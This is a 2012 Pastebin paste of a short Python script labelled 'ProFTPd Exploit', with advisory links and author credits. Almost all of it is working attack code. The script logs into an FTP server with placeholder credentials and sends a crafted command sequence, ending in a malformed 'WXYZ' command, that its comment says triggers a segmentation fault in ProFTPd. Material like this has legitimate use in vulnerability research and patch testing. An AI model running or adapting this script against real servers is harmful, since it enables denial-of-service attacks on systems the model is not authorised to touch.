Advertisement
Guest User

ProFTPdExploit

a guest
Apr 2nd, 2012
611
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.10 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. """
  4. ProFTPd Exploit
  5.  
  6. Advisory:
  7. http://bugs.proftpd.org/show_bug.cgi?id=3711
  8. Nessus:
  9. http://www.nessus.org/plugins/index.php?view=single&id=56956
  10.  
  11. Download:
  12. ftp://ftp1.at.proftpd.org/ProFTPD/distrib/source/
  13.  
  14. Credits:
  15. Ruben Garrote García
  16. Twitter: @boken_
  17. rubengarrote@gmail.com
  18. http://boken00.blogspot.com - boken00@gmail.com
  19. """
  20.  
  21. # Parameters
  22. ftpServer = "192.168.1.10"
  23. ftpServerPort = 21
  24. ftpUsername = "user"
  25. ftpPassword = "password"
  26. ftpClient = "192.168.1.11"
  27. ftpClientPort = "1025"
  28.  
  29. # Commands to trigger the segmentation fault.
  30. ftpCommands = """USER %s
  31. PASS %s
  32. SYST
  33. TYPE A
  34. PORT %s,%s
  35. RETR nada
  36. WXYZ *Buguroo/
  37. QUIT
  38. """ % (ftpUsername, ftpPassword, ftpClient.replace('.',','), "%s,%s"%(("%04x"%int(ftpClientPort))[0:2],("%04x"%int(ftpClientPort))[2:4]))
  39.  
  40. import socket
  41.  
  42. # Open commands socket
  43. sc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  44. sc.connect((ftpServer,ftpServerPort))
  45.  
  46. # Will send FTP commands.
  47. for command in ftpCommands.split('\n'):
  48.     print sc.recv(1024),    
  49.     sc.send(command+'\r\n')
  50.     print command
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement